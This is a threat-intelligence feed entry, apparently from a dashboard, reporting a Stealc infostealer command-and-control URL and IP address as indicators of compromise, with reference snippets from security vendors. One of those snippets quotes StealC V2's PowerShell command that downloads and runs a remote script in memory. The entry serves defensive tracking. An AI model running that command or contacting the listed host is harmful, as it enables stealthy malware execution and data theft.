TF-1812015
high
📛 Threat Title
Stealc: URL that is used for botnet Command&control (C&C) http://31.76.251.143/0f1da281ab93408e9369.php
Description
Indicator that identifies a botnet command&control server (C&C). IOC type: URL that is used for botnet Command&control (C&C). Attributed malware: Stealc. Confidence: 100. First seen: 2026-05-13 23:08:02 UTC. Last seen: 2026-05-14 11:10:33 UTC. Reporter: Bitsight. Tags: c2, Loader, Stealc, stealer, VOLK.
Indicators of Compromise (2)
Each indicator is enriched from the IOC database, threat-intel feed corroboration (Threat Hunt) and VirusTotal. Click one to expand.
ipv4
31.76.251.143
VT: VT base fetch failed: HTTPError: 429 Client Error: Too Many Requests for url: https://www.virustotal.com/api/v3/ip_addresses/31.76.251.143
IOC database
- Type
- ipv4
- Value
31.76.251.143- First seen
- Last seen
- Attached to this threat
- Appears in
- 2 threats
- Description
- Resolved from url http://31.76.251.143/0f1da281ab93408e9369.php
Threat Hunt — feed corroboration
Not present in any configured threat-intel feed.
Details From VirusTotal
VirusTotal: VT base fetch failed: HTTPError: 429 Client Error: Too Many Requests for url: https://www.virustotal.com/api/v3/ip_addresses/31.76.251.143
url
http://31.76.251.143/0f1da281ab93408e9369.php
IOC database
- Type
- url
- Value
http://31.76.251.143/0f1da281ab93408e9369.php- First seen
- Last seen
- Attached to this threat
- Appears in
- 2 threats
- Description
- URL that is used for botnet Command&control (C&C) attributed to Stealc
Threat Hunt — feed corroboration
Not present in any configured threat-intel feed.
Details From VirusTotal
No VirusTotal details cached for this IOC. Open the IOC page to query VirusTotal.
References (2)
- Malpedia profile Threatfox IOCs/Threats
-
ThreatFox IOC page
Threatfox IOCs/Threats
Indicator that identifies a botnet command&control server (C&C). IOC type: URL that is used for botnet Command&control (C&C). Attributed malware: Stealc. Confidence: 100. First seen: 2026-05-13 23:08:02 UTC. Last seen: 2026-05-14 04:09:39 UTC. Reporter: Bitsight. Tags: c2, Loader, Stealc, stealer, VOLK.
Remediations (8)
-
web:any.run
Stealc is a stealer malware that targets victims' sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server ...
-
web:blog.lexfo.fr
A command and control server A command and control server, also known as C2 or CnC (Command and Control), is a server belonging to a malicious actor, enabling them to collect and even interact with an agent (malware) installed on an infected workstation.
-
web:blog.sekoia.io
In early February 2023, Sekoia.io identified a new malware family when tracking infrastructures distributing information stealers. The Command and Control (C2) communications of the associated samples share similarities with those of Vidar and Raccoon. Further analysis by Sekoia.io allowed us to associate this new malware family with Stealc .
-
web:cybersecuritynews.com
For PowerShell script execution, StealC V2 utilizes a more direct approach with the command: powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]'). This method allows the malware to execute remote scripts directly in memory without writing them to disk, making detection more challenging.
-
web:dailysecurityreview.com
StealC malware receives major upgrade with advanced stealth, encryption, and data theft tools, including real-time Telegram alerts and full desktop screenshot capabilities.
-
web:hunt.io
Stealc is a new information-stealing malware targeting sensitive data across various industries. Learn about its capabilities and mitigation strategies.
-
web:www.sonicwall.com
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth ...
-
web:www.zscaler.com
Introduction StealC is a popular information stealer and malware downloader that has been sold since January 2023. In March 2025, StealC version 2 (V2) was introduced with key updates, including a streamlined command-and-control (C2) communication protocol and the addition of RC4 encryption (in the latest variants). The malware's payload delivery options have been expanded to include ...
AI Forensic Analysis
Only Available for Registered Users. Sign in to view.